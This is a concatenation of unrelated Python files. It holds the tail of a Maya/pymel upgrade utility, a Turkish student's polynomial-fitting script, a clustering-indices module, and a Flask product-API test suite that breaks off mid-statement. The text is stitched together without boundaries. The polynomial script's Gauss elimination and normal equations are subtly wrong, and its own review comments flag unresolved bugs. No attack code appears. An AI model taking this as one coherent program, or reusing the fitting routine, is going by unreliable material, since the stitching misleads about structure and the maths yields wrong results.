skipping: %s (use force=True to force conversion)" % fpath if not test: # keep as part of the log so that undo will work log.write( fpath + '\n' ) else: modified, stat = upgradeFile( fpath, test ) if modified and stat: print 'needs upgrading:' if test else 'upgraded:', fpath if not test: log.write( fpath + '\n' ) completed.append(fpath) elif verbose: print "skipping", os.path.join(root,f) #print 'before', root, dirs # dirs must be modified in-place i = 0 tmpdirs = dirs[:] for dir in tmpdirs: #print '\t', `dir` if dir.startswith('.') or dir == 'pymel' \ or not os.path.isfile(os.path.join(root, dir, '__init__.py')) \ or ( excludeFolderRegex and re.match( excludeFolderRegex, dir ) ): del dirs[i] if verbose: print "skipping", os.path.join(root, dir) else: i += 1 #print 'after', root, dirs except Exception, err: import traceback traceback.print_exc() finally: if not test: print "writing log to %s" % logfile log.close() if test: print "test complete" print "to upgrade the listed files run:\nupgrade(test=False)" else: print "upgrade complete. the original files have been renamed with a %s extension\n" % BACKUPEXT print "to remove the backed-up original files run:\ncleanup(%r)\n" % logfile print "to restore the original files run:\nundo(%r)" % logfile def undoFile(filepath): """ undo a single file """ backup = filepath + BACKUPEXT if os.path.isfile(backup): try: os.rename(backup, filepath ) print "restored", filepath except (IOError, OSError), err: print "error restoring file %s.pmbak to %s: %s" % ( filepath, filepath, err) return False else: print "error restoring %s: backup file does not exist: %s. 
skipping" % ( filepath, backup) return True def _findbackups(): undofiles = [] for path in sys.path + os.environ['MAYA_SCRIPT_PATH'].split(os.pathsep): for root, dirs, files in os.walk(path): #print root for f in files: if f.endswith('.py' + BACKUPEXT) and not f.startswith('.'): fpath = os.path.realpath(os.path.join(root,f.rstrip(BACKUPEXT))) #print "adding", fpath undofiles.append(fpath) i = 0 tmpdirs = dirs[:] for dir in tmpdirs: #print '\t', `dir` if dir.startswith('.') or dir == 'pymel' \ or not os.path.isfile(os.path.join(root, dir, '__init__.py')): del dirs[i] else: i += 1 return undofiles def _getbackups(logfile, force): try: log = open(_getLogfile(logfile), 'r' ) except LogError, e: if force: undofiles = _findbackups() else: raise LogError, str(e) + '.\nif you lost your logfile, set force=True to search sys.path for *.pmbak files to restore instead.' else: undofiles = [ x.rstrip() for x in log.readlines() if x] log.close() return undofiles def undo(logfile=None, force=False): """ undo converted files to their original state and remove backups :param logfile: the logfile containing the list of files to restore. if None, the logfile will be determined in this order: 1. last used logfile (module must have remained loaded since running upgrade) 2. MAYA_APP_DIR 3. current working directory :param force: if you've lost the original logfile, setting force to True will cause the function to recurse sys.path looking for backup files to restore instead of using the log. if your sys.path is setup exactly as it was during upgrade, all files should be restored, but without the log it is impossible to be certain. """ undofiles = _getbackups(logfile, force) try: for file in undofiles: undoFile(file) print 'done' except Exception, err: import traceback traceback.print_exc() def cleanup(logfile=None, force=False): """ remove backed-up files. run this when you are certain that the upgrade went smoothly and you no longer need the original backups. 
:param logfile: the logfile containing the list of files to restore. if None, the logfile will be determined in this order: 1. last used logfile (module must have remained loaded since running upgrade) 2. MAYA_APP_DIR 3. current working directory :param force: if you've lost the original logfile, setting force to True will cause the function to recurse sys.path looking for backup files to cleanup instead of using the log. if your sys.path is setup exactly as it was during upgrade, all files should be restored, but without the log it is impossible to be certain. """ undofiles = _getbackups(logfile, force) try: for file in undofiles: bkup = file + BACKUPEXT try: print "removing", bkup os.remove(bkup) except (IOError, OSError), err: print "error removing file %s: %s" % ( bkup, err) print 'done' except Exception, err: import traceback traceback.print_exc()
# Yeşim Şekerciler - 140401067
# Least-squares-style polynomial fitting (degrees 1..6) using a hand-rolled
# Gauss elimination. Reads one sample value per line from 'veriler.txt' and
# writes the fitted coefficients plus a mean-relative-error measure for each
# degree to 'sonuc.txt'.
import math  # kept from the original file, although nothing below uses it


def gauss(r):
    """Solve the augmented linear system ``r`` (n rows, n+1 columns) in place.

    Returns the solution vector, i.e. the last column after elimination.
    NOTE(review): this is the original non-pivoting scheme; it can divide by
    zero for systems that would need row swaps — confirm inputs avoid that.
    """
    lenrow = len(r)
    lencol = len(r[0])
    # Forward elimination: for pivot column j, subtract multiples of row j
    # from the rows below it (m walks from the bottom row upward).
    for j in range(lenrow):
        m = lenrow - 1
        k = j
        z = j
        for i1 in range(lenrow - 1):
            if r[j][k] == 0:
                continue  # zero pivot: skip instead of swapping rows
            coeff = r[m][z] / r[j][k]
            for i in range(lencol):
                x = r[j][i]
                if x == r[m][i]:
                    continue  # original quirk: skip columns with equal entries
                r[m][i] -= coeff * x
            m -= 1
        # Redundant in this placement (k and z are reset every j iteration),
        # preserved from the original code.
        k += 1
        z += 1
    # Eliminate the remaining entries of row 0 using the other pivot rows.
    for i in range(1, lenrow):
        coeff = r[i][i] / r[0][i]
        for j in range(lencol):
            r[0][j] -= (r[i][j] / coeff)
    # Normalize each row by its pivot; non-augmented entries are truncated to
    # int (original behavior), the augmented column keeps its float value.
    for i in range(lenrow - 1, -1, -1):
        for j in range(lencol - 1, -1, -1):
            if j != lencol - 1:
                r[i][j] = int(r[i][j] / r[i][i])
                continue
            r[i][j] /= r[i][i]
    a = []
    for i in range(lenrow):
        a.append(r[i][lencol - 1])  # solution = final augmented column
    return a


def polinom(y, derece):
    """Fit a degree-``derece`` polynomial to samples ``y`` (values at x=1..n).

    Builds the (derece+1) x (derece+2) augmented normal-equation-style system
    and solves it with :func:`gauss`.  Entries of ``y`` are converted with
    ``int`` (they may be strings read from the data file).
    """
    sumy = 0
    n = len(y)
    for i in y:
        sumy += int(i)
    # x_list[i] = sum over samples of (x ** i) with x = 1..n
    x_list = [0 for _ in range(derece * 2 + 1)]
    xi = 0
    for i in range(derece * 2 + 1):
        for j in range(n):
            xi += pow(j + 1, i)
        x_list[i] = xi
        xi = 0
    # a: coefficient matrix of the linear system; c: right-hand side
    a = [[0 for _ in range(derece + 1)] for _ in range(derece + 1)]
    c = [0 for _ in range(derece + 1)]
    c[0] = sumy
    for i in range(1, derece + 1):
        c[i] = int(x_list[i] * sumy)
    for i in range(derece + 1):
        for j in range(derece + 1):
            a[i][j] = int(x_list[j + i])
        a[i].append(c[i])  # append RHS to form the augmented row
    return gauss(a)


def err(y, polinom):
    """Mean relative error of the fitted polynomial against samples ``y``.

    ``polinom`` is the coefficient vector [a0, a1, ...]; sample i is compared
    against the polynomial evaluated at x = i+1 (matching ``polinom()``'s
    construction).  Mutates ``y`` in place, converting entries to float
    (original behavior, relied on by the caller).

    BUGFIX: the original accumulated ``pow(polinom[j], j)`` — a constant that
    ignores x entirely, giving every sample the same prediction — instead of
    evaluating the polynomial at each sample point.
    """
    for i in range(len(y)):
        y[i] = float(y[i])
    err = []
    hata = []
    for i in range(len(y)):
        err_ = polinom[0]
        for j in range(1, len(polinom)):
            err_ += polinom[j] * pow(i + 1, j)  # evaluate at x = i+1
        err.append(err_)
    for i in range(len(y)):
        hata.append(abs((abs(err[i]) - y[i]) / err[i]))
    return sum(hata) / len(y)


def main():
    """Fit degrees 1..6 to the full data set and to 10-sample windows."""
    with open('veriler.txt', 'r') as f:
        y = f.readlines()

    err1 = [err(y, polinom(y, i)) for i in range(1, 7)]

    with open('sonuc.txt', 'w') as f1:
        for i in range(1, 7):
            f1.writelines("%s. dereceden polinom\n" % i)
            f1.writelines("{0}\n".format(polinom(y, i)))
            f1.writelines("{0}. dereceden polinomun r değeri:{1}\n\n".format(
                i, err(y, polinom(y, i))))
        f1.writelines("\n")
        # NOTE(review): "En uygun" (best) is selected with max(err1); since
        # err() returns a mean relative error, min() looks intended — confirm.
        f1.writelines("En uygun polinom:{0}. dereceden polinom\nr değeri:{1}\n".format(
            err1.index(max(err1)) + 1, max(err1)))
        for j in range(0, len(y), 10):
            for i in range(1, 7):
                f1.writelines(("{0}. dereceden polinom {1} ile {2} verileri arası\n").format(i, j, j + 10))
                f1.writelines("{0}\n".format(polinom(y[j:j + 10], i)))
                f1.writelines("{0} ile {1} verileri arası {2}. dereceden polinomun r değeri:{3}\n\n".format(
                    j, j + 10, i, err(y[j:j + 10], polinom(y[j:j + 10], i))))


if __name__ == "__main__":
    main()
"""
Module containing functions for clustering and cluster indices generation
from samples of data
"""
import logging

import numpy as np
import tqdm

from .utils import read_bag_file, extract_bag_index
from .internal_indices import InternalIndices, INTERNAL_INDICES_METHOD_NAMES_DICT
from .external_indices import ExternalIndices, EXTERNAL_INDICES_METHOD_NAMES_DICT

logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
                    datefmt = '%m/%d/%Y %H:%M:%S',
                    level = logging.INFO)
logger = logging.getLogger(__name__)

# External indices are evaluated identically for every clustering algorithm.
# FIX: the kmeans/hierarchical lists previously contained the placeholder
# '<NAME>̂' where the other lists (and the feature-vector triples) have
# 'Hubert Γ̂'; that placeholder would raise KeyError when looked up in
# EXTERNAL_INDICES_METHOD_NAMES_DICT.  ('McNemar' stays disabled, as in the
# original selections.)
_CHOOSEN_EXTERNAL_INDICES = [
    'Entropy', 'Purity', 'Precision', 'Recall', 'F', 'Weighted-F',
    'Folkes-Mallows', 'Rand', 'Adjusted-Rand', 'Adjusted-Mutual-Info',
    'Normalized-Mutual-Info', 'Homogeneity', 'Completeness', 'V-Measure',
    'Jaccard', 'Hubert Γ̂', 'Kulczynski', 'Phi', 'Russel-Rao',
    'Rogers-Tanimoto', 'Sokal-Sneath1', 'Sokal-Sneath2',
]


def _make_choosen_indices(internal_indices):
    """Build a per-algorithm selection dict from its internal-index list."""
    return {
        'internal_indices': list(internal_indices),
        'external_indices': list(_CHOOSEN_EXTERNAL_INDICES),
    }


# Per-algorithm index selections.  Only the internal-index subset differs
# between algorithms; further index names are available in
# INTERNAL_INDICES_METHOD_NAMES_DICT / EXTERNAL_INDICES_METHOD_NAMES_DICT.
KMEANS_CHOOSEN_CLUSTER_INDICES = _make_choosen_indices(
    ['Silhouette', 'C', 'Dunn', 'Score'])
HIERARCHICAL_CHOOSEN_CLUSTER_INDICES = _make_choosen_indices(
    ['Silhouette', 'C', 'Dunn', 'Score'])
SPECTRAL_CHOOSEN_CLUSTER_INDICES = _make_choosen_indices(
    ['Silhouette', 'C', 'Dunn', 'Davies-Bouldin', 'Ray-Turi', 'Score'])
HDBSCAN_CHOOSEN_CLUSTER_INDICES = _make_choosen_indices(
    ['Log-SS-Ratio', 'Silhouette', 'Dunn', 'Score'])

# Flat, fixed ordering of (algorithm, index family, index name) used by
# convert_cluster_indices_to_features().  Derived from the selections above
# (internal indices first, then external, per algorithm) so the two can never
# drift apart; this reproduces the original hand-written ordering exactly.
FEATURE_VECTOR_CLUSTER_INDICES_ORDER_TRIPLES = [
    (algorithm, indices_type, index_name)
    for algorithm, choosen in [
        ('kmeans', KMEANS_CHOOSEN_CLUSTER_INDICES),
        ('hierarchical', HIERARCHICAL_CHOOSEN_CLUSTER_INDICES),
        ('spectral', SPECTRAL_CHOOSEN_CLUSTER_INDICES),
        ('hdbscan', HDBSCAN_CHOOSEN_CLUSTER_INDICES),
    ]
    for indices_type in ('internal_indices', 'external_indices')
    for index_name in choosen[indices_type]
]


def _evaluate_cluster_indices(dataset, cluster_labels, choosen_indices):
    """Compute the selected internal and external indices for one labeling.

    Shared implementation for all generate_*_cluster_indices functions
    (previously four near-identical copies).

    :param dataset: object exposing ``data`` (samples) and ``target``
        (ground-truth labels).
    :param cluster_labels: cluster assignment produced by a clustering run.
    :param choosen_indices: dict with 'internal_indices' and
        'external_indices' lists of index names to evaluate.
    :return: ``{'internal_indices': {name: value}, 'external_indices': {...}}``
    """
    internal_indices_values = dict()
    internal_validation = InternalIndices(dataset.data, cluster_labels)
    for internal_index in choosen_indices['internal_indices']:
        # Index names map to method names on the validation object.
        internal_index_method = getattr(
            internal_validation, INTERNAL_INDICES_METHOD_NAMES_DICT[internal_index])
        internal_indices_values[internal_index] = internal_index_method()

    external_indices_values = dict()
    external_validation = ExternalIndices(dataset.target, cluster_labels)
    for external_index in choosen_indices['external_indices']:
        external_index_method = getattr(
            external_validation, EXTERNAL_INDICES_METHOD_NAMES_DICT[external_index])
        external_indices_values[external_index] = external_index_method()

    return {
        'internal_indices': internal_indices_values,
        'external_indices': external_indices_values,
    }


def generate_kmeans_cluster_indices(dataset, choosen_indices, n_jobs=None):
    """Cluster ``dataset`` with k-means and score the resulting labeling.

    :param dataset: object exposing ``data``, ``target`` and
        ``perform_kmeans_clustering`` (see ``read_bag_file``).
    :param choosen_indices: index-name selection dict (see module constants).
    :param n_jobs: parallelism forwarded to the clustering routine.
    :return: nested dict of index name -> value per index family.
    """
    cluster_labels = dataset.perform_kmeans_clustering(
        n_clusters='n_classes', n_jobs=n_jobs)
    return _evaluate_cluster_indices(dataset, cluster_labels, choosen_indices)


def generate_hierarchical_cluster_indices(dataset, choosen_indices, n_jobs=None):
    """Cluster ``dataset`` hierarchically and score the resulting labeling.

    ``n_jobs`` is accepted for signature parity with the other generators but
    is not forwarded (the hierarchical routine takes no such argument, as in
    the original code).
    """
    cluster_labels = dataset.perform_hierarchical_clustering(n_clusters='n_classes')
    return _evaluate_cluster_indices(dataset, cluster_labels, choosen_indices)


def generate_spectral_cluster_indices(dataset, choosen_indices, n_jobs=None):
    """Cluster ``dataset`` with spectral clustering and score the labeling."""
    cluster_labels = dataset.perform_spectral_clustering(
        n_clusters='n_classes', n_jobs=n_jobs)
    return _evaluate_cluster_indices(dataset, cluster_labels, choosen_indices)


def generate_hdbscan_cluster_indices(dataset, choosen_indices, n_jobs=None):
    """Cluster ``dataset`` with HDBSCAN and score the resulting labeling.

    When ``n_jobs`` is None, HDBSCAN's ``core_dist_n_jobs`` defaults to 4
    (original behavior).
    """
    cluster_labels = dataset.perform_hdbscan_clustering(
        core_dist_n_jobs=(n_jobs if n_jobs is not None else 4))
    return _evaluate_cluster_indices(dataset, cluster_labels, choosen_indices)


def bag_generate_cluster_indices(bag_filename, n_jobs=1):
    """
    Perform clustering on the bags and generate cluster indices evaluating
    the quality of clusters
    """
    bag_index = extract_bag_index(bag_filename)
    dataset = read_bag_file(bag_filename)

    logger.info("Bag %2d : performing kmeans clustering, generating cluster indices", bag_index)
    kmeans_cluster_indices = generate_kmeans_cluster_indices(
        dataset, KMEANS_CHOOSEN_CLUSTER_INDICES, n_jobs=n_jobs)

    logger.info("Bag %2d : performing hierarchical clustering, generating cluster indices", bag_index)
    hierarchical_cluster_indices = generate_hierarchical_cluster_indices(
        dataset, HIERARCHICAL_CHOOSEN_CLUSTER_INDICES, n_jobs=n_jobs)

    logger.info("Bag %2d : performing spectral clustering, generating cluster indices", bag_index)
    spectral_cluster_indices = generate_spectral_cluster_indices(
        dataset, SPECTRAL_CHOOSEN_CLUSTER_INDICES, n_jobs=n_jobs)

    logger.info("Bag %2d : performing hdbscan clustering, generating cluster indices", bag_index)
    hdbscan_cluster_indices = generate_hdbscan_cluster_indices(
        dataset, HDBSCAN_CHOOSEN_CLUSTER_INDICES, n_jobs=n_jobs)

    cluster_indices = {
        'kmeans': kmeans_cluster_indices,
        'hierarchical': hierarchical_cluster_indices,
        'spectral': spectral_cluster_indices,
        'hdbscan': hdbscan_cluster_indices,
    }
    return cluster_indices


def convert_cluster_indices_to_features(cluster_indices):
    """
    Convert the cluster indices into a flat feature vector

    Values are extracted in the fixed order given by
    FEATURE_VECTOR_CLUSTER_INDICES_ORDER_TRIPLES and returned as a 1-D
    numpy array.
    """
    feature_vector = [
        cluster_indices[algorithm][indices_type][index_name]
        for algorithm, indices_type, index_name
        in FEATURE_VECTOR_CLUSTER_INDICES_ORDER_TRIPLES
    ]
    return np.array(feature_vector)
""" Product API Service Test Suite Test cases can be run with the following: nosetests -v --with-spec --spec-color coverage report -m """ import os import logging from unittest import TestCase from unittest.mock import patch from flask_api import status # HTTP Status Codes from service.models import db from service.service import app, init_db, internal_server_error from tests.product_factory import ProductFactory SHOPCART_ENDPOINT = os.getenv('SHOPCART_ENDPOINT', 'http://localhost:5000/shopcarts') ###################################################################### # T E S T C A S E S ###################################################################### class TestProductServer(TestCase): """ REST API Server Tests """ @classmethod def setUpClass(cls): """ This runs once before the entire test suite """ init_db() app.debug = False app.testing = True app.config["SQLALCHEMY_DATABASE_URI"] = app.config["TEST_DATABASE_URI"] @classmethod def tearDownClass(cls): """ This runs once after the entire test suite """ db.session.close() def setUp(self): """ This runs before each test """ self.app = app.test_client() db.drop_all() # clean up the last tests db.create_all() # create new tables def tearDown(self): """ This runs after each test """ db.session.remove() db.drop_all() def _create_products(self, count): """ Factory method to create products in bulk """ products = [] for _ in range(count): test_product = ProductFactory() resp = self.app.post( "/api/products", json=test_product.serialize(), content_type="application/json" ) self.assertEqual( resp.status_code, status.HTTP_201_CREATED, "Could not create test product" ) new_product = resp.get_json() test_product.id = new_product["id"] products.append(test_product) return products ###################################################################### # P L A C E T E S T C A S E S H E R E ###################################################################### def test_index(self): """ Test index call """ resp = 
self.app.get("/") self.assertEqual(resp.status_code, status.HTTP_200_OK) def test_create_product(self): """ Create a new Product """ test_product = ProductFactory() logging.debug(test_product) resp = self.app.post( "/api/products", json=test_product.serialize(), content_type="application/json" ) self.assertEqual(resp.status_code, status.HTTP_201_CREATED) location = resp.headers.get("Location", None) self.assertIsNotNone(location) # Check the data is correct new_product = resp.get_json() self.assertEqual(new_product["name"], test_product.name, "Names do not match") self.assertEqual( new_product["category"], test_product.category, "Categories do not match" ) self.assertEqual( new_product["description"], test_product.description, "Descriptions do not match" ) self.assertEqual( new_product["price"], test_product.price, "Prices do not match" ) resp = self.app.get(location) self.assertEqual(resp.status_code, status.HTTP_200_OK) new_product = resp.get_json() self.assertEqual(new_product["name"], test_product.name, "Names do not match") self.assertEqual( new_product["category"], test_product.category, "Categories do not match" ) self.assertEqual( new_product["description"], test_product.description, "Descriptions do not match" ) self.assertEqual( new_product["price"], test_product.price, "Prices do not match" ) def test_create_product_with_invalid_content_type(self): """ Create a new Product with invalid content type""" test_product = ProductFactory() logging.debug(test_product) resp = self.app.post( "/api/products", json=test_product.serialize(), content_type="text/plain" ) self.assertEqual(resp.status_code, status.HTTP_415_UNSUPPORTED_MEDIA_TYPE) def test_create_product_with_bad_request(self): """ Create a new Product with bad request""" test_product = ProductFactory() logging.debug(test_product) test_product.category = "" resp = self.app.post( "/api/products", json=test_product.serialize(), content_type="application/json" ) self.assertEqual(resp.status_code, 
status.HTTP_400_BAD_REQUEST) def test_get_product(self): """ Get a single product by its ID """ # get the id of a product test_product = self._create_products(1)[0] resp = self.app.get("/api/products/{}".format(test_product.id)) self.assertEqual(resp.status_code, status.HTTP_200_OK) data = resp.get_json() self.assertEqual(data["name"], test_product.name) def test_get_product_not_found(self): """ Get a product that's not found """ resp = self.app.get("/api/products/0") self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND) def test_get_product_bad_request(self): """ Get a product with invalid product id """ resp = self.app.get("/api/products/a") self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST) resp = self.app.get("/api/products/3.3") self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST) def test_delete_a_product(self): """ Delete a Product """ test_product = self._create_products(1)[0] resp = self.app.delete("/api/products/{}".format(test_product.id)) self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT) self.assertEqual(len(resp.data), 0) # make sure they are deleted resp = self.app.get("/api/products/{}".format(test_product.id)) self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND) def test_delete_product_bad_request(self): """ Get a product with invalid product id """ resp = self.app.delete("/api/products/a") self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST) resp = self.app.delete("/api/products/3.3") self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST) def test_update_product(self): """ Update an existing Product """ # create a product to update test_product = ProductFactory() test_product_name = test_product.name test_product_description = test_product.description test_product_price = test_product.price resp = self.app.post( "/api/products", json=test_product.serialize(), content_type="application/json") self.assertEqual(resp.status_code, status.HTTP_201_CREATED) # update the product 
        # (continuation of an update test that begins above this chunk)
        # verify the full-update request succeeded
        new_product = resp.get_json()
        new_product["category"] = "Education"
        resp = self.app.put(
            "/api/products/{}".format(new_product["id"]),
            json=new_product,
            content_type="application/json")
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        updated_product = resp.get_json()
        self.assertEqual(updated_product["category"], "Education")
        # create an update request with partial information
        part_product = resp.get_json()
        part_product["category"] = ""
        resp = self.app.put(
            "/api/products/{}".format(part_product["id"]),
            json=part_product,
            content_type="application/json")
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        updated_product = resp.get_json()
        # an empty field must not overwrite the previously stored value
        self.assertEqual(updated_product["category"], "Education")
        part_product = resp.get_json()
        part_product["name"] = ""
        resp = self.app.put(
            "/api/products/{}".format(part_product["id"]),
            json=part_product,
            content_type="application/json")
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        updated_product = resp.get_json()
        self.assertEqual(updated_product["name"], test_product_name)
        part_product = resp.get_json()
        part_product["description"] = ""
        resp = self.app.put(
            "/api/products/{}".format(part_product["id"]),
            json=part_product,
            content_type="application/json")
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        updated_product = resp.get_json()
        self.assertEqual(updated_product["description"], test_product_description)
        part_product = resp.get_json()
        part_product["price"] = ""
        resp = self.app.put(
            "/api/products/{}".format(part_product["id"]),
            json=part_product,
            content_type="application/json")
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        updated_product = resp.get_json()
        self.assertEqual(updated_product["price"], test_product_price)

    def test_update_product_not_found(self):
        """ Update a product that's not found """
        test_product = ProductFactory()
        # id 0 is never assigned, so the PUT must 404
        resp = self.app.put(
            "/api/products/0",
            json=test_product.serialize(),
            content_type="application/json")
        self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)

    def test_update_product_bad_request(self):
        """ Update a product with bad request body """
        # create a product to update
        test_product = ProductFactory()
        resp = self.app.post(
            "/api/products",
            json=test_product.serialize(),
            content_type="application/json")
        self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
        # create an update request with bad request body
        new_product = resp.get_json()
        # non-integer product id in the URL -> 400
        resp = self.app.put(
            "/api/products/a",
            json=new_product,
            content_type="application/json")
        self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)
        # float product id in the URL -> 400
        resp = self.app.put(
            "/api/products/3.3",
            json=new_product,
            content_type="application/json")
        self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)
        test_product = ProductFactory()
        test_product_name = test_product.name
        test_product_description = test_product.description
        test_product_price = test_product.price
        resp = self.app.post(
            "/api/products",
            json=test_product.serialize(),
            content_type="application/json")
        self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
        # update the product
        new_product = resp.get_json()
        # non-numeric price in the body -> 400
        new_product["price"] = "a"
        resp = self.app.put(
            "/api/products/{}".format(new_product["id"]),
            json=new_product,
            content_type="application/json")
        self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)

    def test_get_product_list(self):
        """ Get a list of Products """
        self._create_products(5)
        resp = self.app.get("/api/products")
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        data = resp.get_json()
        self.assertEqual(len(data), 5)

    def test_query_product_list_by_category(self):
        """ Query Products by Category """
        products = self._create_products(10)
        test_category = products[0].category
        category_products = [product for product in products
                             if product.category == test_category]
        resp = self.app.get("/api/products",
                            query_string="category={}".format(test_category))
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        data = resp.get_json()
        self.assertEqual(len(data), len(category_products))
        # check the data just to be sure
        for product in data:
            self.assertEqual(product["category"], test_category)

    def test_query_product_list_by_name(self):
        """ Query Products by Name """
        products = self._create_products(10)
        test_name = products[0].name
        name_products = [product for product in products
                         if product.name == test_name]
        resp = self.app.get("/api/products",
                            query_string="name={}".format(test_name))
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        data = resp.get_json()
        self.assertEqual(len(data), len(name_products))
        # check the data just to be sure
        for product in data:
            self.assertEqual(product["name"], test_name)

    def test_query_product_list_by_description(self):
        """ Query Products by Description """
        products = self._create_products(10)
        test_description = products[0].description
        description_products = [product for product in products
                                if product.description == test_description]
        resp = self.app.get("/api/products",
                            query_string="description={}".format(test_description))
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        data = resp.get_json()
        self.assertEqual(len(data), len(description_products))
        # check the data just to be sure
        for product in data:
            self.assertEqual(product["description"], test_description)

    def test_query_product_by_price(self):
        """ Query Products by Price Range """
        products = self._create_products(10)
        # a range guaranteed to contain products[0]
        test_max_price = products[0].price * 10
        test_min_price = products[0].price / 10
        price_products = [product for product in products
                          if product.price >= test_min_price
                          and product.price <= test_max_price]
        resp = self.app.get("/api/products",
                            query_string="minimum={}&maximum={}".format(
                                test_min_price, test_max_price))
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        data = resp.get_json()
        self.assertEqual(len(data), len(price_products))

    def test_query_product_list_by_name_category(self):
        """ Query Products by Name and Category """
        products = self._create_products(10)
        test_name = products[0].name
        test_category = products[0].category
        name_category_products = [product for product in products
                                  if product.name == test_name
                                  and product.category == test_category]
        resp = self.app.get("/api/products",
                            query_string="name={}&category={}".format(
                                test_name, test_category))
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        data = resp.get_json()
        self.assertEqual(len(data), len(name_category_products))
        # check the data just to be sure
        for product in data:
            self.assertEqual(product["name"], test_name)
            self.assertEqual(product["category"], test_category)

    def test_query_product_list_by_name_description(self):
        """ Query Products by Name and Description """
        products = self._create_products(10)
        test_name = products[0].name
        test_description = products[0].description
        name_description_products = [product for product in products
                                     if product.name == test_name
                                     and product.description == test_description]
        resp = self.app.get("/api/products",
                            query_string="name={}&description={}".format(
                                test_name, test_description))
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        data = resp.get_json()
        self.assertEqual(len(data), len(name_description_products))
        # check the data just to be sure
        for product in data:
            self.assertEqual(product["name"], test_name)
            self.assertEqual(product["description"], test_description)

    def test_query_product_by_name_price(self):
        """ Query Products by Name and Price """
        products = self._create_products(10)
        test_name = products[0].name
        test_max_price = products[0].price * 10
        test_min_price = products[0].price / 10
        name_price_products = [product for product in products
                               if product.name == test_name
                               and product.price >= test_min_price
                               and product.price <= test_max_price]
        resp = self.app.get("/api/products",
                            query_string="name={}&minimum={}&maximum={}".format(
                                test_name, test_min_price, test_max_price))
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        data = resp.get_json()
        self.assertEqual(len(data), len(name_price_products))
        # check the data just to be sure
        for product in data:
            self.assertEqual(product["name"], test_name)

    def test_query_product_list_by_category_description(self):
        """ Query Products by Category and Description """
        products = self._create_products(10)
        test_category = products[0].category
        test_description = products[0].description
        category_description_products = [product for product in products
                                         if product.category == test_category
                                         and product.description == test_description]
        resp = self.app.get("/api/products",
                            query_string="category={}&description={}".format(
                                test_category, test_description))
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        data = resp.get_json()
        self.assertEqual(len(data), len(category_description_products))
        # check the data just to be sure
        for product in data:
            self.assertEqual(product["category"], test_category)
            self.assertEqual(product["description"], test_description)

    def test_query_product_by_category_price(self):
        """ Query Products by Category and Price """
        products = self._create_products(10)
        test_category = products[0].category
        test_max_price = products[0].price * 10
        test_min_price = products[0].price / 10
        category_price_products = [product for product in products
                                   if product.category == test_category
                                   and product.price >= test_min_price
                                   and product.price <= test_max_price]
        resp = self.app.get("/api/products",
                            query_string="category={}&minimum={}&maximum={}".format(
                                test_category, test_min_price, test_max_price))
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        data = resp.get_json()
        self.assertEqual(len(data), len(category_price_products))
        # check the data just to be sure
        for product in data:
            self.assertEqual(product["category"], test_category)

    def test_query_product_by_description_price(self):
        """ Query Products by Description and Price """
        products = self._create_products(10)
        test_description = products[0].description
        test_max_price = products[0].price * 10
        test_min_price = products[0].price / 10
        description_price_products = [product for product in products
                                      if product.description == test_description
                                      and product.price >= test_min_price
                                      and product.price <= test_max_price]
        resp = self.app.get("/api/products",
                            query_string="description={}&minimum={}&maximum={}".format(
                                test_description, test_min_price, test_max_price))
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        data = resp.get_json()
        self.assertEqual(len(data), len(description_price_products))
        # check the data just to be sure
        for product in data:
            self.assertEqual(product["description"], test_description)

    def test_query_product_by_name_category_description(self):
        """ Query Products by Name, Category and Description """
        products = self._create_products(10)
        test_name = products[0].name
        test_category = products[0].category
        test_description = products[0].description
        name_category_description_products = [product for product in products
                                              if product.name == test_name
                                              and product.category == test_category
                                              and product.description == test_description]
        resp = self.app.get("/api/products",
                            query_string="name={}&category={}&description={}".format(
                                test_name, test_category, test_description))
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        data = resp.get_json()
        self.assertEqual(len(data), len(name_category_description_products))
        # check the data just to be sure
        for product in data:
            self.assertEqual(product["name"], test_name)
            self.assertEqual(product["category"], test_category)
            self.assertEqual(product["description"], test_description)

    def test_query_product_by_name_category_price(self):
        """ Query Products by Name, Category and Price """
        products = self._create_products(10)
        test_name = products[0].name
        test_category = products[0].category
        test_max_price = products[0].price * 10
        test_min_price = products[0].price / 10
        name_category_price_products = [product for product in products
                                        if product.name == test_name
                                        and product.category == test_category
                                        and product.price >= test_min_price
                                        and product.price <= test_max_price]
        resp = self.app.get("/api/products",
                            query_string="name={}&category={}&minimum={}&maximum={}".format(
                                test_name, test_category, test_min_price, test_max_price))
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        data = resp.get_json()
        self.assertEqual(len(data), len(name_category_price_products))
        # check the data just to be sure
        for product in data:
            self.assertEqual(product["name"], test_name)
            self.assertEqual(product["category"], test_category)

    def test_query_product_by_name_description_price(self):
        """ Query Products by Name, Description and Price """
        products = self._create_products(10)
        test_name = products[0].name
        test_description = products[0].description
        test_max_price = products[0].price * 10
        test_min_price = products[0].price / 10
        name_description_price_products = [product for product in products
                                           if product.name == test_name
                                           and product.description == test_description
